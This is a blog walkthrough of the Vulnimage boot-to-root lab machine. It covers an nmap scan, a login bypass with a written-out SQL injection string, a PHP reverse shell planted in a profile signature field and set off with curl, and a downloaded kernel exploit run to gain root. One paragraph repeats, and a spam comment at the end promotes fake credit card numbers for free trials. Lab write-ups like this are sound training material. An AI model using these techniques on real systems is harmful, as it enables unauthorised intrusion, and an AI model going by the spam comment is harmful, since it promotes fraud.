Sunday, August 20, 2017

Vulnimage Walkthrough

This blog post contains a walkthrough for the boot-to-root Virtual Machine, Vulnimage. The purpose of this boot-to-root challenge is to test users in network security skill sets which are needed for penetration tests as the user attempts to gain root/system privileges of the remote machine. After determining the IP address of the Vulnimage virtual machine by viewing the show arp table of my layer 3 switch I used the tool, NMAP to the scan the target.



After the NMAP scan had finished, I examined the report and identified that there is an Apache service running on the machine on port (80), I decided this would be where I first force my efforts for gaining root privileges of the machine. At the root of the Apache server I found a link to the myblog.php which I appears to the a blog created by one of the target machine users.


Following the links through the website I was able to find a login page used by the blogger to sign into the blogging service.



After viewing the response from the web server regarding the login attempt, I resent the request for login to repeater tab, I modified the password field and replaced admin with "' or 1=1 -'" which a common SQL injection used for bypass authentication.




As shown in the Burp repeater response report I was able to see that I was successful in bypassing the login page using the credentials ‘admin:’ or 1=1 –” and I was able to make a post on the blog as the “admin” user. While examining the website further I came across a link which would allow me to modify a “users” profile, the specific part that I was able to modify the “sig” value, this would change the “signature” of a user. I changed the signature of the admin user to test. As I was able to change the signature to the value “test”, I then decided to test to see if the webserver was able to change the “sig” field if it was placed within PHP code.


The password field contains “‘ or 1=1 –‘” which bypasses the authenication process.



As shown in the Burp repeater response report I was able to see that I was successful in bypassing the login page using the credentials ‘admin:’ or 1=1 –” and I was able to make a post on the blog as the “admin” user. While examining the website further I came across a link which would allow me to modify a “users” profile, the specific part that I was able to modify the “sig” value, this would change the “signature” of a user. I changed the signature of the admin user to test. As I was able to change the signature to the value “test”, I then decided to test to see if the webserver was able to change the “sig” field if it was placed within PHP code.




After I was able to inject the PHP reverse shell code, I identified that the shell was located in the admin-sig.php file located within the profiles directory, the tool, curl, I was able to activate the PHP reverse shell.




I was able to determine that my shell privilege of www-data, I was currently at the “/” of the remote file system, and the version of the kernel I was working with is “Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux”. I found a relevant exploit at “http://exploit-db.com/sploits/2009-therebel.tgz”, I downloaded the exploit and placed it within the /var/www/ directory on my local machine and activated the local Apache server.





Once the exploit was transferred I used the tar command to unpack the .tgz file, once unpacked I ran the script “therebel.sh” and once the script was successfully exploit I checked to see if I have successfully gained root privileges for the shell.




I have successfully exploited the Vulnimage virtual machine and gained a reverse shell from the target and escalated the shell to root permissions, successfully gaining full root control of the target machine.




1 comment:

Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to ...